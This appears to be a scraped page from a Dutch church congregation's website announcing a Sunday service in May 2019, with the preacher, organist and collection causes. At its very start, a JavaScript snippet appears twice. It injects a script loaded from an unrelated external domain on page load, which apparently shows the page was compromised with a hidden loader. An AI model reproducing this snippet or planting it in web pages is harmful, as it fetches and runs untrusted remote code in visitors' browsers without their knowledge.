;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 12 mei 2019 9:30 uur - PKN Damwâld
zondag 12 mei 2019
09:30 uur
Voorbereiding Heilig Avondmaal; bevestiging nieuwe ambtsdragers

Kerkdienst zondag 12 mei 2019 9:30 uur

Informatie

Voorganger:Ds. S. Boukes
Organist:Margrietha Zagema
Mededeling:Voorbereiding Heilig Avondmaal; bevestiging nieuwe ambtsdragers
Bijlagen
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Moeders en gevangenschap.

Moederdag is niet voor iedereen een verwendag. Zo zit de man van Esmee een gevangenisstraf van twee jaar uit. Esmee zorgt in haar eentje voor hun kind, het inkomen en het huishouden. Jonge moeder Mariska zit een jaar in de gevangenis en kan daardoor niet voor haar twee kinderen zorgen. Gevangenschap heeft grote gevolgen voor de gevangene en hun directe omgeving. Via de organisaties Gevangenenzorg Nederland en Exodus Nederland ondersteunt Kerk in Actie (ex)gedetineerden. Goed getrainde vrijwilligers bieden een luisterend oor. Zij zijn maatjes voor moeders als Mariska, zodat deze tijdens hun detentie kunnen praten over kinderen, relaties, werk en financiën. Ook staan zij kinderen bij waarvan ouders in detentie zitten en rijden hen zo nodig naar de gevangenis om hun ouder te bezoeken, bijvoorbeeld op feestdagen. We collecteren juist op Moederdag voor dit waardevolle werk.
Uw bijdrage is welkom via de collecte, 12 mei, op moederdag. Of maak uw gift over op de rekening van de diaconie o.v.v. collecte diaconie12 mei. Alvast hartelijk dank!

Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris